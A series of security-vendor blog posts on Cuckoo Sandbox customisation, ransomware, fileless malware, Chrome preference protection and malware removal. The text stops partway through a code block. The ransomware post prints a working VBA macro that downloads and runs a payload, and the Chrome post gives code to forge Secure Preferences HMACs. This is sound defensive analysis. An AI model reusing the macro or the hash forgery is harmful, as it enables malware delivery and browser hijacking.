Cuckoo Sandbox Customization

May 4, 2016, 12:22 am

Cuckoo Sandbox is a neat open source project used by many people around the world to test malware into a secure environment, to understand how they work and what they do. Cuckoo is written in a modular way, with python language. It’s really easy to customize, and this is what I’m going to show you here.

Cuckoo Sandbox

You can download and install Cuckoo Sandbox here, and here’s a tutorial on how to configure it. We will not cover the installation of cuckoo itself because the guide is really well done.

Customization, the idea

Let’s study a real example that we’ve done for our own purpose, here at Adlice Labs. We wanted an easy way to test for malware removal with our software, RogueKiller. The idea is to get a removal report for malware that we send to the sandbox, let’s take a look.

The Cuckoo team made a guide for customization as well, this will be our reference.
In our templates below, for consistency all our file modules will be named “custom.py”. Just adapt to your case.

Auxiliary (guest) module

The auxiliary guest modules are located into /analyzer/windows/modules/auxiliary.
They are executed before the malware, on the guest machine. Therefore they can be useful to log some initial state machine information.

import logging
import json

from lib.common.abstracts import Auxiliary
from lib.common.results import NetlogFile

log = logging.getLogger(__name__)

class Custom(Auxiliary):
    """Gather custom data"""

    def __init__(self, options={}, analyzer=None):
        Auxiliary.__init__(self, options, analyzer)

    def start(self):
        log.info("Starting my Custom auxiliary module")
        nf = NetlogFile("logs/initial.json")
        nf.send(json.dumps(['foo', {'bar': ('baz', None, 1.0, 2, False)}]))

As a result, a initial.json file is created into /logs.

Package module

The package modules are located into /analyzer/windows/modules/packages.
They are responsible for executing and injecting the malware for analysis, they are executed on the guest.
You can define different execution routines, depending on the type of malware (exe, swf, pdf, …)
I have implemented the finish method to make some post execution actions, we will see later for a concrete example of this.

import os
import shlex
import json
import logging

from lib.common.abstracts import Package
from lib.common.results import NetlogFile

log = logging.getLogger("analyzer")

class CustomExe(Package):
    """Custom analysis package."""

    def start(self, path):
        args = self.options.get("arguments", "")

        name, ext = os.path.splitext(path)
        if not ext:
            new_path = name + ".exe"
            os.rename(path, new_path)
            path = new_path

        return self.execute(path, args=shlex.split(args))

    # Post execution
    def finish(self):
        nf = NetlogFile("logs/post.json")
        nf.send(json.dumps(['foo', {'bar': ('baz', None, 1.0, 2, False)}]))
        return True

As a result, a post.json file is created into /logs.

Processing module

The processing modules are located into /modules/processing.
They are executed on the host, to append data generated by the modules above into the global container. That way, the data will be available by all the next modules for processing and reporting.

To enable a new processing module, you need to add that section into /conf/processing.conf.

[custom]
enabled = yes

import os
import json

from lib.cuckoo.common.abstracts import Processing
from lib.cuckoo.common.exceptions import CuckooProcessingError

class Custom(Processing):
    """Analysis custom information."""

    def run(self):
        """Run debug analysis.
        @return: debug information dict.
        """
        self.key = "custom"
        data = {}
        try:
          #initial
          custom_log = os.path.join(self.logs_path, "initial.json")
          with open(custom_log) as json_file:          
            data["initial"] = json.load(json_file)
        except Exception, e:
          raise CuckooProcessingError(str(e))

        try:
          #post
          custom_log = os.path.join(self.logs_path, "post.json")
          with open(custom_log) as json_file:          
            data["post"] = json.load(json_file)
        except Exception, e:
          raise CuckooProcessingError(str(e))

        return data

As a result, data from initial.json and post.json are appended into the global container. If the Json reporting module (builtin) is enabled, you will retrieve their content into it, under the “custom” key.

Reporting module

The reporting modules are located into /modules/reporting.
They are executed on the host, to translate data from the global container into a different format. It could be a HTML page, json file, even a PDF or something else.

To enable a new reporting module, you need to add that section into /conf/reporting.conf.

[custom]
enabled = yes

import os
import json
import codecs

from lib.cuckoo.common.abstracts import Report
from lib.cuckoo.common.exceptions import CuckooReportError

class Custom(Report):
    """Saves custom results in JSON format."""   
    def run(self, results):
        """Writes report.
        @param results: Cuckoo results dict.
        @raise CuckooReportError: if fails to write report.
        """

        try:
            path = os.path.join(self.reports_path, "custom.json")

            with codecs.open(path, "w", "utf-8") as report:
                json.dump(results["custom"], report, sort_keys=False, indent=4)
        except (UnicodeError, TypeError, IOError) as e:
            raise CuckooReportError("Failed to generate JSON report: %s" % e)

As a result, data from initial.json and post.json that was stored in the global container is returning back to a single “custom.json” file. But we could have easily done a HTML, a PDF or something else.

Concrete use case: Removal report

The idea is to get a removal report for a malware with a given anti-malware scanner, RogueKiller.
To do so, we will use a new package module, for which we will write a finish routine that runs and inject our antimalware:

import os
import shlex
import json
import logging
import urllib2
import tempfile

from lib.common.abstracts import Package
from lib.common.results import upload_to_host
from lib.api.process import Process
from lib.common.defines import KERNEL32

log = logging.getLogger("analyzer")

class ExeWithRemoval(Package):
    """Custom analysis package."""

    def start(self, path):
        args = self.options.get("arguments", "")

        name, ext = os.path.splitext(path)
        if not ext:
            new_path = name + ".exe"
            os.rename(path, new_path)
            path = new_path

        return self.execute(path, args=shlex.split(args))

    # Post execution
    def finish(self):
        try: 
          #download
          response = urllib2.urlopen("http://link_to_roguekillercmd.exe")
          f = tempfile.NamedTemporaryFile(delete=False)           
          data = response.read()   
          f.write(data)
           
          #rename
          path = f.name + ".exe"          
          f.close()
          os.rename(f.name, path)
          log.info("Downloaded remover program to %s", path)

          #execute
          args = "-scan -dont_ask -params \"-autoremove\""
          pid  = self.execute(path, args=shlex.split(args))
          log.info("Executing remover program with args: %s", args)

          #wait for end
          while Process(pid=pid).is_alive():
              KERNEL32.Sleep(1000)			  
		  
          #upload report
          upload_to_host("C:/path_to_my_report.json", "logs/removal.json")

          log.info("Executed remover program with args: %s", args)
        except Exception, e:
          log.exception("Error while loading the remover program")

        return True

After the analysis is done, finish() is called. In this method we download in a temporary file our anti-malware (in CLI version), then we run it under cuckoo injection.
Once the report is generated we upload it back to the host to attach it to our analysis. Then the cuckoo report is generated and we can compare what the malware did, and what the anti-malware was able to catch and remove. Simple as that!

In our example below, the malware was a fake putty binary, notice the RogueKillerCMD scanner running.

Image may be NSFW.
Clik here to view.

Links

The post Cuckoo Sandbox Customization appeared first on Adlice Software.

↧

YaraEditor

May 10, 2016, 12:56 am

≫ Next: Ransomware : Spreading and Prevention

≪ Previous: Cuckoo Sandbox Customization

Features:

Syntax highlighting.
Drag N drop support.
Write signatures in a form-like style.
Handle rules set (multiple rules)
Compile rules and fix your errors.
Test your rules against strings (ANSI/Unicode).
Test your rules by scanning processes memory.
Test your rules by scanning files.

User guide

Start the tool.
Drag a file on the interface, or start from scratch.
Add as many rules as needed.
Compile them, and check for errors.
In the test tab, add some test items and run the tests.
Matched items should appear.

The post YaraEditor appeared first on Adlice Software.

↧

Ransomware : Spreading and Prevention

June 14, 2016, 12:27 am

≫ Next: MRF: Introducing Sample Page

≪ Previous: YaraEditor

Ransomware : Spreading and prevention methods

Definition

A ransomware is typically a software that denies the user to access its personal files and asks for a ransom in return. “Classic” ransomware usually starts on system startup and stops the Desktop from appearing. If the ransom is not paid within a certain period of time, files will be deleted.

A crypto-ransomware or cryptoware encrypts the user’s files and asks the user a payment in exchange of a software that will be able to decrypt them.

A Little History About Ransomware

The concept of ransomware, literally software that asks for a ransom, is known for a long time (AIDS Trojan, 1989) but these form of malware has had very little impact. Their means of propagation were unsophisticated as well as their encryption routine.

However, year 2013, mark their return with the uprising of the CryptoLocker malware. It differed from its predecessors by using a strong encryption routine and was using the Zeus botnet to propagate. In the rest of this article, we will focus specifically on current crypto-ransomware, especially Locky.

Spreading Methods

Macros
Most of the time, the infection lies in the form of an attached file in a spam. Usually, the file is a Word or Excel document (respectively .doc and .xls).

Image may be NSFW.
Clik here to view.

A spam mail containing an infected Word file. Source : pulsetheworld.com

These documents include a macro, which will be executed when the document is opened.
An example of such macro :

' Location of the payload (hacked WordPress setup). Multiple URls can be present
url = "http://[redacted]/wp-includes/certificates/xh3uc"

' Name of the file to be created.
fileName = "temp.pif"

' Obtaining local computer %temp% path using the Environment collection (Shell object)
pathName = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")
pathName = pathName & '\'

' Creation of a XMLHttpRequest object (XML request using HTTP) used to download the payload
dim webRequest: Set webRequest = createobject("Microsoft.XMLHTTP")

' Creation of a Stream Object (ADO) used to manipulate the stream
dim stream: Set stream = createobject("Adodb.Stream")

' Synchronous connexion established with remote server using GET HTTP method 
webRequest.Open "GET", url, False

' HTTP request to the server
webRequest.Send
with stream
    .type = 1 ' Binary data
    .open ' Creation and opening of a new Stream object
    .write webRequest.responseBody ' Write the response body (in this case, the payload) in the new object
    .savetofile pathName &  fileName, 2 ' Save the binary contents of the stream to a file
										' Overwrites the file if it already exists
end with

' Creation of a new Application object and execution of the payload using its contexts.
Set payload = CreateObject("Shell.Application")
payload.Open pathName & fileName

This macro is executed when the document is opened. It downloads the real infection (payload) from a server operated by the malware creator then execute it. In some cases, the ransomware will make a copy the file containing the macro in the shared folders and remote drives of the computer.

Exploits
Exploit kits use vulnerabilities present in web browsers to automatically download and execute the crypto-ransomware payload. No user action is required. Social engineering can also be used to trick the user to install the infection by presenting itself, for example like a legit software update.

Encryption and Ransom Note

Once the crypto-ransomware is executed, it will establish a connexion with the offender server and will generate a pair of cryptographic keys. One of them, the public key, will be used to encrypt the files and will be stored on the victim’s computer. The other one, the private key, will be kept on the offender server and could be used to decrypt the files. This is called asymmetric encryption.

Encrypted files are thus rendered completely unreadable.

Once this step is completed, the malware removes the System Restore Points and the content of the Shadow Copy that may contain a copy of the files in their unencrypted state. It will then create a note informing the user that its files have been encrypted and containing a link to a Bitcoin container where the ransom should be paid (usually between 0.5 and 1.5 bitcoins).

@@@@@@@ NOT YOUR LANGUAGE? USE https://translate.google.com

@@@@@@@ What happened to your files ?
@@@@@@@ All of your files were protected by a strong encryption with RZA4096
@@@@@@@ More information about the en-Xryption keys using RZA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

@@@@@@@ How did this happen ?
@@@@@@@ !!! Specially for your PC was generated personal RZA4096 Key , both publik and private.
@@@@@@@ !!! ALL YOUR FILES were en-Xrypted with the publik key, which has been transferred to your computer via the Internet.
@@@@@@@ !!! Decrypting of your files is only possible with the help of the privatt key and de-crypt program , which is on our Secret Server

@@@@@@@ What do I do ?
@@@@@@@ So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way
@@@@@@@ If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment


Your personal ID: [Redacted]

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 - http://gvxtkcbjnslm5vnt.onion.to
2 - http://gvxtkcbjnslm5vnt.onion.cab
3 - http://gvxtkcbjnslm5vnt.onion.city

If for some reasons the addresses are not available, follow these steps:

1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 - After a successful installation, run the browser
3 - Type in the address bar - http://gvxtkcbjnslm5vnt.onion
4 - Follow the instructions on the site

Be sure to copy your personal ID and the instruction link to your notepad not to lose them.

Ransomware has much benefited from the bitcoin development since no identification is required to open an account, which allows them to remain anonymous.

A screenshot of the website gvxtkcbjnslm5vnt.onion, only accessible using the Tor network.

Image may be NSFW.
Clik here to view.

If the ransom is paid, the user will usually receive a utility containing the private key that can be used to decrypt the files. However, if he waits too long, the private key will be deleted of the server, making the decryption impossible.

Disinfection / Recovery of the Encrypted Files

There is no universal solution.
It is advised to submit one of them to ID Ransomware which will analyse it. The application will be able to tell if the version of the malware is known and if a free decryption tool has been released.

Prevention

Conventional antivirus software is not really effective against such threats. When the infection is detected, most if not all the data is usually already encrypted.

Furthermore, the rate detection of the payload is quite low. However, some tools were specially designed for this purpose. These include Malwarebytes anti-ransomware and Bitdefender anti-ransomware. They use a behavioural-based approach to identify crypto-ransomware. More specifically, running processes are watched and if one of them modifies the headers of multiple files, the software terminates it forcefully.

However, they are not infallible and it is very likely that specially deceptive variants will be released in a near future.

A good practice is also to keep software updated to limit the attack surface regarding exploits and to disallow the automatic execution of macros. Keep copies of personal documents on external drives or cloud services are also strongly recommended.

Conclusion

Ransomware and specially crypto-ransomwares are expected to be developed further in the future. Indeed, those are very profitable and relatively easy to write.

Software-based protections exist but it would be unwise to trust them blindly. The best solution for the time being seemed to do regular backup of personal data so as to have a copy at any time.

This copy could also be used in case of hard drive failure, which can happen at any time and where there is a high probability that the data is completely unrecoverable.

FAQ

Should I pay ?
It is recommended not to give in to blackmail. Indeed, it only encourages the perpetrators and sometimes even after paying, files cannot be decrypted. However, if the data is really valuable and that any recovery attempts have failed, it is a solution.

I won’t pay. Should I delete the files affected ?
It is advised to keep the data in case a free decrypting tool is released in the future.

Why not develop free decrypting tools for each variant of the malware ?
The development of such tools is only made possible when cryptographic flaws are discovered or when private keys are released, for example when a server is seized.
These, however, are very rare occurrences.

I’ve got plenty of time and a powerful computer. Should I try to find the private key using brute force attack ?
Usually, recent crypto-ransomware uses RSA key of 2048-bit length or more. Experts agree that these are uncrackable using brute force.

Why don’t we systematically seize servers / bitcoin accounts used by the perpetrators ?
Justice is working on it but it is a long and complicated process. In addition to this, hacked computers are often used for these purposed. However, Operation Tovar showed that it was possible by ending the CryptoLocker infection and recovering the database containing private keys.

The post Ransomware : Spreading and Prevention appeared first on Adlice Software.

↧

MRF: Introducing Sample Page

October 20, 2016, 8:39 am

≫ Next: Fileless Malware using Powershell

≪ Previous: Ransomware : Spreading and Prevention

MRF (or Malware REpository Framework) is a all-in-one website framework intended to be used by malware researchers or companies to store and classify the threats they are gathering from different sources (SPAM, honeypot, etc…).

This new release (V4.2) is bringing a whole lot of new features and bugfixes, including a Sample page, a comments editor and users permissions.

Image may be NSFW.
Clik here to view.

Changlog

## Version 4.2
Sample page  
Using new modular installer  
Changed favorite filter for a checkbox  
Added user rights management  
Now comments have a WISIWIG editor  
Added tooltip for bulk selection and favorite  
Added Github project link in the sidebar  
Added URLs description name  
Fixed Signout redirection issue  
Fixed bug when menu wasn't showing because of too few samples  
Fixed overwritting of existing sample  
Fixed menu not showing on IE/Chrome  
Fixed page scrolling on Editing/Save  
Fixed URLs search  
Fixed Comment/URLs refresh when re-opening modal editors

User permissions

User permissions have been added to restrict, allow, people to perform some actions like uploading files, download files, modify information, etc. Now with MRF 4.2 you can fine tune users capabilities to keep control on your repository.

Sample Page

The sample page has been added to display new information (currently only SHA256) regarding a sample, and to have a quick way to share a sample with your co-workers (with a link). We are also introducing a way to add more interesting features like Hex editor, PE parsing information or disassembly.

Image may be NSFW.
Clik here to view.

MRF V4.2 is RELEASED. Check it out, and give it a try!

Fileless Malware using Powershell

October 21, 2016, 7:48 am

≫ Next: Google Chrome: Bypassing Secure Preferences

≪ Previous: MRF: Introducing Sample Page

Fileless malware has always been popular and widely covered (Example: Poweliks), because it really changes the classic Antimalware concept of scanning disks for malware.

Fileless malware used to hide in the registry in the past, but today we will study a new (at least for us) technique to do so, by using a scheduled task.

Potentially Unwanted

The malware using that task is called “System Healer”, and is classified as PUP (Potentially Unwanted Program) by many antiviruses. We classify as Adware, and totally unwanted, since it’s clearly trying to avoid detection from antiviruses.

That malware opens advertising and hijacks the web browsers startup page and search page. Unfortunately we don’t have any hash to share since the task file was sent to us without any other attachment.

Scheduled Task

The task used to store the malware is looking like the following picture. It’s using Powershell to start a VB script encoded in base64 with help of the -EncodedCommand switch.

Image may be NSFW.
Clik here to view.

Payload

After having decoded the base64 payload (with any online service) we found it was a Visual Basic script with very poor obfuscation intended to download the actual malware (another Powershell script) from a link and execute it with the Invoke-Expression command.

That way, the malware is executed in memory without the need of having a file, just a scheduled task. We haven’t been beyond this point because the URL hardcoded in the payload was already shutdown by the provider.

Image may be NSFW.
Clik here to view.

Detection and Removal

RogueKiller (as of version 12.7.4) is able to parse the task parameters, extract and decode the payload, as well as classify the task as malicious and remove it.

Image may be NSFW.
Clik here to view.

Google Chrome: Bypassing Secure Preferences

November 4, 2016, 7:39 am

≫ Next: Introducing: Adlice Labs

≪ Previous: Fileless Malware using Powershell

Google Chrome protects its user preferences using a hashing (HMAC SHA256) mechanism. However, there’s a way to bypass it and it’s quite used by malware in the wild.

We will first study the way Chrome protects its user settings (Secure Preferences), then we will see how it can be defeated by rewriting the needed hashes. In the end, we will study a malware that uses that technique and we will see how RogueKiller Anti-malware can defeat it using that technique as well.

Secure Preferences

Each user profile (located in %localappdata%/Google/Chrome/User Data/ProfileName) has a bunch of configuration files for storing bookmarks, history, and preferences. Among those files, two of them (Preferences, Secure Preferences) are storing the user settings like homepage, search engine, etc…

Secure Preferences implements (as its name suggests) some securing mechanism to ensure no malware comes to modify the file manually. This is achieved by hashing some of the json nodes with a custom hashing protocol, based on HMAC SHA256, each time a setting is modified by Google Chrome.

At startup, Chrome then verifies all the hashes and if something doesn’t match it asks for a restore.

Image may be NSFW.
Clik here to view.

This is how (an infected) Secure Preferences file looks like:

{
  "browser": {
    "show_home_button": true
  },
  "default_search_provider": {
    "enabled": true,
    "encodings": "UTF-8",
    "prepopulate_id": 0
  },
  "default_search_provider_data": {
    "template_url_data": {
      "keyword": "trotux",      
      "url": "http:\/\/www.trotux.com\/search\/?q={searchTerms}&z=63239075972bb5d9d70da35g4zdm9zdeacac3q6oct&from=icb&uid=VBOXXHARDDISK_VB3d33e4ab-f149eb42&type=sp",
      ...
    }
  },
  "extensions": {
    "known_disabled": [
      
    ],
    "settings": {
        ...
    }
  },
  "homepage": "http:\/\/www.trotux.com\/?z=63239075972bb5d9d70da35g4zdm9zdeacac3q6oct&from=icb&uid=VBOXXHARDDISK_VB3d33e4ab-f149eb42&type=hp",
  "homepage_changed": true,
  "homepage_is_newtabpage": false,
  "pinned_tabs": [    
  ],
  "protection": {
    "macs": {
      "browser": {
        "show_home_button": "D72D3A4AE301492E30C5840566DCCD9EE5F2066E792805D5F59B7DFC056B2F83"
      },
      "default_search_provider": {
        "keyword": "4E70E531D9FE35B77433ED7CBB36F9A72701C928679E49F64F71E63D3813EF86",
        "name": "2C12B4EE800F1C223FDF8B2D24967192C55841015DBE6F3602538E75B2209075",
        "search_url": "7AB9E5FCF7FF91530B1F36B3D593EA9D48DE74BB228B8F566BBC4E74C4E97705"
      },
      "default_search_provider_data": {
        "template_url_data": "14C800C1FB62974BB653070FEABEC06A4F91ED01773354C03B5C2456DCC3B78A"
      },
      "extensions": {
        "known_disabled": "3B2D6F2EE0DE5BB99976E4DE120B6C6E9E8AE6D50BA6665CF4D7A617783CA5B9",
        "settings": {
          ...
        }
      },
      "google": {
        "services": {
          "account_id": "B06F39E76B49B24DE765021EBB621EC88FD029F86F4FE2A588360110A7DF4EA1",
          "last_account_id": "2CE2762DD69EB763602E6D67F063A9A3302909B0080C6962F7E4BBE1F3AC1861",
          "last_username": "C1E45A7D2667A3CFE15B5F1BA572E51554F5BB35AC5ABB709DC3EC0E83596FC3",
          "username": "C9139E29A994D7131018AF8C6520A3EFBE59BB3555D3CE5B6F07906CCD10456D"
        }
      },
      "homepage": "6D5A2725E3385B12610051F2019FDC7452CFF7863DF5C4A202CFACF5AE166ACF",
      "homepage_changed": true,
      "homepage_is_newtabpage": "8CD33E8A34AD6F5F8341702ED482FD16020BBBA37972D958168D8334945CA533",
      "pinned_tabs": "6443846DA531F6BDFFE87F17E1AFF9739D4A816CABCAAAF35C0A0EF0E81D9162",
      "prefs": {
        "preference_reset_time": "DE6810A8F6703E3EDEABD407E27612F88E9DBA3B0318692F57A71005142C2B69"
      },
      "profile": {
        "reset_prompt_memento": "7122E3BBEDDBEC92FDBBD0899A15E3D0B6F8C546195045E571405DFB99C8B82D"
      },
      "safebrowsing": {
        "incidents_sent": "DA02CC41A2157A273538A127A693AF1AB06329276766E7A0BFA1DCCED5720D4A"
      },
      "search_provider_overrides": "C623DCD793B7DE76BEE45387932E1D245150D190F5322680F0F0E88F73698487",
      "session": {
        "restore_on_startup": "F1AD6F4A7E65CBCA6683C30586F2F14B958729A1A2E89231DF300F245B5923DD",
        "startup_urls": "CCFD36CED4675FF0817C0847AFE300476D804E7AAE437CB2B074F5E8477A4C2D"
      },
      "software_reporter": {
        "prompt_seed": "FED73C26AAD4579B62F8793895CBEC2ECFBE59199C79AB68F486A29AAC51B220",
        "prompt_version": "623DD568AFD8A981E71A63CD11663071E151C2B96171AD56D3C58558A6776133"
      }
    },
    "super_mac": "3AA7590924852A9F2A55AC29641D603DDF1EAC8D96E72B0582770B5BC49CD47B"
  },
  "session": {
    "restore_on_startup": 4,
    "startup_urls": [
      "http:\/\/www.trotux.com\/?z=63239075972bb5d9d70da35g4zdm9zdeacac3q6oct&from=icb&uid=VBOXXHARDDISK_VB3d33e4ab-f149eb42&type=hp"
    ]
  },
  "sync": {    
  }
}

We can see a few interesting fields regarding startup urls and homepage (highlighted). For each field, we have a corresponding entry in the “protection.macs” node. If some program modifies (manually) one of the settings above it will need to update the corresponding hash in the macs, as well as the “super_mac” entry.

Custom HMAC

The custom HMAC hash is fortunately documented from the Chromium sources. With a little bit of reverse, guesses and code reading, we’ve been able to reproduce the algorithm:

The HMAC SHA256 is a hashing mechanism that produces a SHA256 from a key (or seed) and a message. Let’s see how to obtain them:

HMAC Seed

The seed is unique to a machine where Chrome is installed (or per Chrome version?). It’s stored in Chrome’s installation path (C:\Program Files (x86)\Google\Chrome\Application\ChromeVersion\resources.pak). This format is quite known now, and well explained here.

All you need to do is to look for the first resource with a length of 64.

Image may be NSFW.
Clik here to view.

HMAC Message

To build the message, we first need to get a Machine ID (unique identifier per machine). We can follow the logic once again in the Chromium sources, but basically it looks like this:

Obtain machine SID

Get machine name with GetComputerName (JOHN-PC)
Get SID for machine name with LookupAccountName
Convert SID to string with ConvertSidToStringSid (S-1-5-21-1650828501-840997873-2917006960)

Obtain volume ID

Get system drive letter with GetSystemDirectory (C:)
Get serial number with GetVolumeInformation (1551496638)

Create machine ID

The machine ID can then be obtained with the following pseudo-code (please note everything is performed as binary operations):

machine_id = SHA1(machine_sid) + volume_id
machine_id += CRC8(machine_id)
machine_id = ToString(machine_id)

Looks like: 6C91392A619A18390D101846C1656CC6812CA02D5C79F5BE89

Obtain the message

The message can be obtained using the following pseudo-code:

message = machine_id (6C91392A619A18390D101846C1656CC6812CA02D5C79F5BE89)
message += json_path (extensions.settings.aapocclcgogkmnckokdopfmhonfmgoek)
message += json_content ({"ack_external":true,"app_launcher_ordinal":"z",...,"was_installed_by_oem":false})

Looks like: 6C91392A619A18390D101846C1656CC6812CA02D5C79F5BE89extensions.settings.aapocclcgogkmnckokdopfmhonfmgoek{"ack_external":true,"app_launcher_ordinal":"z",...,"was_installed_by_oem":false}

Please note that the Json content needs to be modified a little bit by removing the empty arrays and objects, and that the “<" character (for some reason) needs to be replaced by its unicode hexadecimal representation.

Hashing the Message

Find below the code (shortened) we use to hash a json node, given its path and required machine ID and seed. It’s using a HMAC 256 method from cryptopp, but you can use any method you like (works with OpenSSL).

wstring Chrome::GetContentHmac( wstring const& json_path, JsonDB& db, json_t* node ) const
{
    // We need to remove empty arrays and objects
    json_t* clean = db.Clone( node );
    if ( clean == NULL ) return L"";
    JsonDB::RemoveEmpty( clean );

    string json_content     = db.StrAnsi( false, clean, true );
    json_content            = mstring::replacestr( json_content, "<", "\\u003C" );

    JsonDB::Release( clean );

    string key           = mstring( hmac_seed ).to_utf8();
    string path          = mstring( json_path ).to_utf8();
    string content_str   = json_content;
    string msg           = mstring( machine_id ).to_utf8() + path + content_str;

    Buffer key_buff     = Buffer::FromHexString( mstring::from_utf8( key ) );
    wstring hmac        = Encrypt::HMACSHA256String( (const char*) key_buff.Data(), key_buff.Size(), msg );

    return hmac;
}

Once you have that HMAC, it’s easy to replace the corresponding entry in the protection.macs node. After that, you need to get and replace the super_mac as well with the following information:

message = machine_id (6C91392A619A18390D101846C1656CC6812CA02D5C79F5BE89)
message += json_path (empty)
message += json_content (content of the protection.macs node)

We have developed a small script able to check and replace all the broken macs from the secure preferences, here’s some screenshots:

Image may be NSFW.
Clik here to view.

In the Wild

Some malware are using that trick to bypass Chrome protection and install themselves in the user settings.

This the case of the adware Trotux/Elex, which replaces the homepage, startup urls and the search engine. The infected secure preferences given as example comes from this malware.

RogueKiller is able to remove it, as well as cleanup the browser.

Image may be NSFW.
Clik here to view.

Detection and Removal

Starting with version 12.8.0, RogueKiller is able to detect infectious Chrome settings, and remove them. It’s also able to update the protection.macs settings so that the cleanup will be totally transparent for the Chrome browser, and it won’t restore the infected setup.

It’s really important, because any setting restored without updating the HMAC hashes will result in a restoration of the infectious state by the Chrome browser iteself.

Image may be NSFW.
Clik here to view.

Links

The post Google Chrome: Bypassing Secure Preferences appeared first on Adlice Software.

↧

Introducing: Adlice Labs

November 22, 2016, 9:17 am

≫ Next: How to remove malware from my PC

≪ Previous: Google Chrome: Bypassing Secure Preferences

We, at Adlice Software, have started from scratch 5 years ago with a small anti-malware tool called RogueKiller.

Now on, we have developed many public and private tools to help researchers and malware analysts in their everyday job, including ourselves.

Today, I’m proud to show you the way we work with our brand new Labs, Adlice labs.

Telemetry

Our software are sending telemetry data to help us understanding how many users are using each of them, what are their needs (i.e: translations) and to give us an overview on the popularity of them.

We have developed some dashboards telling us how many scans are performed per day, and also a real-time display of connected users. Note: localizations are not stored in our database, they are in a volatile database, our stored data remain anonymous.

Image may be NSFW.
Clik here to view.

Every day scans

Image may be NSFW.
Clik here to view.

Real-time scans

Automated Signatures

The most interesting part in our labs is the automated classification and prioritization of the detections. When RogueKiller sends back all detections after a scan, everything is put into counted detection items, and sorted so that we can see what the top detections are.

If there are a false positive they can be fixed, if there are heuristic detections they can be formalized into a real signature.

Image may be NSFW.
Clik here to view.

Top Detections

Image may be NSFW.
Clik here to view.

My Items view, used by our researchers to process detection items

Malware Database

Our honeypots and automated scripts are also gathering infectious samples (virus, malware, files) and they are sent into our own MRF database. This helps us to organize the malware we receive in order to analyse them when it’s necessary.

Image may be NSFW.
Clik here to view.

MalwareDB

This new way to work will make our software even more efficient, this is only the beginning !
Thanks a lot for supporting us 🙂

The post Introducing: Adlice Labs appeared first on Adlice Software.

↧

How to remove malware from my PC

March 29, 2017, 7:04 am

≫ Next: Cuckoo Sandbox Customization (V2)

≪ Previous: Introducing: Adlice Labs

Is your system infected? Antivirus cannot get rid of the infection?
This process empowers you with the ability to remove most common malware yourself.

Disclaimer

Although it usually does not present any risk, this process is performed under your own responsability. It is therefore strongly advised to make a backup of your data before carrying out the latter. Adlice Software responsibility cannot be engaged for any problem resulting of the following of this process.

Follow these steps :Step 1: RogueKiller Step 2: AdwCleaner Step 3: Malwarebytes Step 4: Need more help?

Step 1: RogueKiller

RogueKiller is an anti-malware scanner featuring advanced heuristics capabilities that are able to detect and remove a broad range of malware. It’s also able to detect potentially unwanted programs (PUP) and potentially unwanted system modifications (PUM).

Please follow RogueKiller Tutorial to complete this step of the process.

Image may be NSFW.
Clik here to view.

Step 2: AdwCleaner

MalwareBytes AdwCleaner is a tool aimed at the removal of adware software.

Please follow AdwCleaner Tutorial to complete this step of the process.

Image may be NSFW.
Clik here to view.

Step 3: Malwarebytes

MalwareBytes 3.0 is the latest version of MalwareBytes awarded product, Malwarebytes Anti-Malware.

Please follow Malwarebytes Tutorial to complete this step of the process.

Image may be NSFW.
Clik here to view.

Step 4 (Optional): Adlice Forum

This standalone guide for malware removal should be able to clean most common malware. However, if you face an uncommon or stubborn infection, it could not be sufficient.
If that’s the case, don’t hesitate to open a new thread on our forum in the Malware Removal section.

The post How to remove malware from my PC appeared first on Adlice Software.

↧

Cuckoo Sandbox Customization (V2)

May 19, 2017, 6:00 am

≫ Next: Catch malware with your own Honeypot (V2)

≪ Previous: How to remove malware from my PC

This post is a rewrite of the previous post, that was about Cuckoo V1, updated for Cuckoo V2.

Cuckoo Sandbox

You can download and install Cuckoo Sandbox here, and here’s a tutorial on how to configure it. We will not cover the installation of cuckoo itself because the guide is really well done.

Customization, the idea

In the below, I will reference 2 different folders by the following:

$$CUCKOO: /usr/local/lib/python2.7/dist-packages/cuckoo/ (cuckoo installation path)
$$CWD: Cuckoo working directory, depends on you

Auxiliary (guest) module

The auxiliary guest modules are located into $$CWD/analyzer/windows/modules/auxiliary.
They are executed before the malware, on the guest machine. Therefore they can be useful to log some initial state machine information.

They don’t need to be activated by a config section, once the file is here it gets executed.

import logging
import json

from common.abstracts import Auxiliary
from common.results import NetlogFile

log = logging.getLogger(__name__)

class Custom(Auxiliary):
    """Gather custom data"""

    def __init__(self, options={}, analyzer=None):
        Auxiliary.__init__(self, options, analyzer)

    def start(self):
        log.info("Starting my Custom auxiliary module")
        nf = NetlogFile("logs/initial.json")
        nf.send(json.dumps(['foo', {'bar': ('baz', None, 1.0, 2, False)}]))

As a result, an initial.json file is created into /logs.

Package module

The package modules are located into $$CWD/analyzer/windows/modules/packages.
They are responsible for executing and injecting the malware for analysis, they are executed on the guest.
You can define different execution routines, depending on the type of malware (exe, swf, pdf, …)
I have implemented the finish method to make some post execution actions, we will see later for a concrete example of this.

They don’t need to be activated by a config section, once the file is here it gets executed.

import os
import shlex
import json
import logging

from common.abstracts import Package
from common.results import NetlogFile

log = logging.getLogger("analyzer")

class CustomExe(Package):
    """Custom analysis package."""

    def start(self, path):
        args = self.options.get("arguments", "")

        name, ext = os.path.splitext(path)
        if not ext:
            new_path = name + ".exe"
            os.rename(path, new_path)
            path = new_path

        return self.execute(path, args=shlex.split(args))

    # Post execution
    def finish(self):
        nf = NetlogFile("logs/post.json")
        nf.send(json.dumps(['foo', {'bar': ('baz', None, 1.0, 2, False)}]))
        return True

As a result, a post.json file is created into /logs.

Processing module

The processing modules are located into $$CUCKOO/processing.
They are executed on the host, to append data generated by the modules above into the global container. That way, the data will be available by all the next modules for processing and reporting.

To enable a new processing module, you need to add the section below into $$CWD/conf/processing.conf.

[custom]
enabled = yes

You also need to add a field to the dictionary defined in $$CUCKOO/common/config.py.

"processing": {
            "analysisinfo": {
                "enabled": Boolean(True),
            },
            "apkinfo": {
                "enabled": Boolean(False),
                "decompilation_threshold": Int(5000000),
            },
            "baseline": {
                "enabled": Boolean(False),
            },
            "behavior": {
                "enabled": Boolean(True),
            },
            "custom": {
                "enabled": Boolean(True),
            },
            ...
},

And finally add your module into $$CUCKOO/processing.

import os
import json

